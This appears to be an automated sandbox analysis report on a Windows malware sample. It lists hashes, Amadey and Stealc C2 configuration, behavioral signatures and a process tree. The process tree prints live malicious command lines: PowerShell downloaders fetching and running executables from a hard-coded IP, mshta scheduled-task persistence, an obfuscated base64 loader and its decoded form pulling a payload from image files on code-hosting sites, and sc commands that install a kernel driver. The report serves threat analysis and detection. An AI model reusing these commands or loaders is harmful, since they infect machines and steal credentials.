Analysis

  • max time kernel
    137s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26/03/2025, 07:12

General

  • Target

    72d706281b940ed3b12e2c1d2cdc9e0b.exe

  • Size

    1.8MB

  • MD5

    72d706281b940ed3b12e2c1d2cdc9e0b

  • SHA1

    77b6bcdab4d139720480a472378a366553e22fa2

  • SHA256

    806f318390f3fd7ed23c129362e0b11813dd3e86a8dd051352900b06ec193d8d

  • SHA512

    de955a979fbbfe247c847c1d8f30394e8b8c62ed1fa37d3874211d3dafcda845867b0a2ee7be093778aee4de19b425796a8a8527a178c0bc9d084b49d2bbeef1

  • SSDEEP

    49152:92/29CJu5qqezLla7PC1MfktJyRcdLMTrWJoljJ:w+QJwqflWC1mRwLMTrWm

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Modifies security service 2 TTPs 2 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 11 IoCs
  • Blocklisted process makes network request 8 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Run Powershell and hide display window.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file 16 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Sets service image path in registry 2 TTPs 7 IoCs
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 22 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 12 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 28 IoCs
  • Identifies Wine through registry keys 2 TTPs 11 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs
  • Loads dropped DLL 25 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 11 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 3 IoCs
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 14 IoCs
  • Launches sc.exe 38 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 2 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 58 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 18 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies registry class 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 7 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 59 IoCs
  • Suspicious use of FindShellTrayWindow 36 IoCs
  • Suspicious use of SendNotifyMessage 29 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\72d706281b940ed3b12e2c1d2cdc9e0b.exe
    "C:\Users\Admin\AppData\Local\Temp\72d706281b940ed3b12e2c1d2cdc9e0b.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:5304
    • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:876
      • C:\Users\Admin\AppData\Local\Temp\10338550101\a1e5f07fd2.exe
        "C:\Users\Admin\AppData\Local\Temp\10338550101\a1e5f07fd2.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:3304
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c schtasks /create /tn OiuormaP63Z /tr "mshta C:\Users\Admin\AppData\Local\Temp\VJqRftF36.hta" /sc minute /mo 25 /ru "Admin" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4244
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /tn OiuormaP63Z /tr "mshta C:\Users\Admin\AppData\Local\Temp\VJqRftF36.hta" /sc minute /mo 25 /ru "Admin" /f
            5⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:4820
        • C:\Windows\SysWOW64\mshta.exe
          mshta C:\Users\Admin\AppData\Local\Temp\VJqRftF36.hta
          4⤵
          • Checks computer location settings
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4296
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'HMEIXKYISQC8RASTG7SXMY2TGIXFQ3IQ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Downloads MZ/PE file
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:5160
            • C:\Users\Admin\AppData\Local\TempHMEIXKYISQC8RASTG7SXMY2TGIXFQ3IQ.EXE
              "C:\Users\Admin\AppData\Local\TempHMEIXKYISQC8RASTG7SXMY2TGIXFQ3IQ.EXE"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:5944
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10338560121\am_no.cmd" "
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:5108
        • C:\Windows\SysWOW64\timeout.exe
          timeout /t 2
          4⤵
          • System Location Discovery: System Language Discovery
          • Delays execution with timeout.exe
          PID:2276
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2836
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:5744
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2004
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3668
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3216
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4508
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /create /tn "jz8TLmaJUGc" /tr "mshta \"C:\Temp\lYy3WR54E.hta\"" /sc minute /mo 25 /ru "Admin" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:5644
        • C:\Windows\SysWOW64\mshta.exe
          mshta "C:\Temp\lYy3WR54E.hta"
          4⤵
          • Checks computer location settings
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:5988
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Downloads MZ/PE file
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4808
            • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
              "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2352
      • C:\Users\Admin\AppData\Local\Temp\10338680101\Q1DOy22.exe
        "C:\Users\Admin\AppData\Local\Temp\10338680101\Q1DOy22.exe"
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of WriteProcessMemory
        PID:4500
        • C:\Windows\SYSTEM32\cmd.exe
          cmd.exe /c 67e2ff36de8a3.vbs
          4⤵
          • Checks computer location settings
          • Modifies registry class
          • Suspicious use of WriteProcessMemory
          PID:692
          • C:\Windows\System32\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67e2ff36de8a3.vbs"
            5⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:4108
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBi@Gk@d@Bi@HU@YwBr@GU@d@@u@G8@cgBn@C8@ZwBm@Gg@Z@Bq@Gs@Z@Bk@C8@agBo@Gg@a@Bo@Gg@a@Bo@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@KQ@s@C@@K@@k@Gw@ZgBz@GQ@ZgBz@GQ@Zw@g@Cs@I@@n@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@G0@ZQB0@Gg@bwBk@C@@PQ@g@CQ@d@B5@H@@ZQ@u@Ec@ZQB0@E0@ZQB0@Gg@bwBk@Cg@JwBs@GY@cwBn@GU@Z@Bk@GQ@Z@Bk@GQ@Z@Bh@Cc@KQ@u@Ek@bgB2@G8@awBl@Cg@J@Bu@HU@b@Bs@Cw@I@Bb@G8@YgBq@GU@YwB0@Fs@XQBd@C@@K@@n@C@@d@B4@HQ@LgBn@GI@awBt@EE@awBt@C8@cwBl@Gw@aQBm@F8@YwBp@Gw@YgB1@H@@Lw@y@DE@MQ@u@DY@Mg@y@C4@M@@2@C4@Mg@2@C8@Lw@6@Cc@L@@g@Cc@M@@n@Cw@I@@n@FM@d@Bh@HI@d@B1@H@@TgBh@G0@ZQ@n@Cw@I@@n@E0@cwBi@HU@aQBs@GQ@Jw@s@C@@Jw@w@Cc@KQ@p@H0@fQ@=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:4504
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $Bytes = 'htt'; $Bytes2 = 'ps://'; $lfsdfsdg = $Bytes +$Bytes2; $links = @(($lfsdfsdg + 'bitbucket.org/gfhdjkdd/jhhhhhhh/downloads/test2.jpg?137113'), ($lfsdfsdg + 'ofice365.github.io/1/test.jpg')); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.gbkmAkm/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
                7⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Suspicious use of SetThreadContext
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:6032
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                  8⤵
                    PID:5964
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                    8⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:3568
        • C:\Users\Admin\AppData\Local\Temp\10338700101\apple.exe
          "C:\Users\Admin\AppData\Local\Temp\10338700101\apple.exe"
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:2592
          • C:\Users\Admin\AppData\Local\Temp\11.exe
            "C:\Users\Admin\AppData\Local\Temp\11.exe"
            4⤵
            • Checks computer location settings
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:5728
            • C:\Windows\system32\cmd.exe
              "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9328.tmp\9329.tmp\932A.bat C:\Users\Admin\AppData\Local\Temp\11.exe"
              5⤵
                PID:2276
                • C:\Users\Admin\AppData\Local\Temp\11.exe
                  "C:\Users\Admin\AppData\Local\Temp\11.exe" go
                  6⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:2112
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\947F.tmp\9480.tmp\9481.bat C:\Users\Admin\AppData\Local\Temp\11.exe go"
                    7⤵
                    • Drops file in Program Files directory
                    PID:5160
                    • C:\Windows\system32\sc.exe
                      sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
                      8⤵
                      • Launches sc.exe
                      PID:1632
                    • C:\Windows\system32\sc.exe
                      sc start ddrver
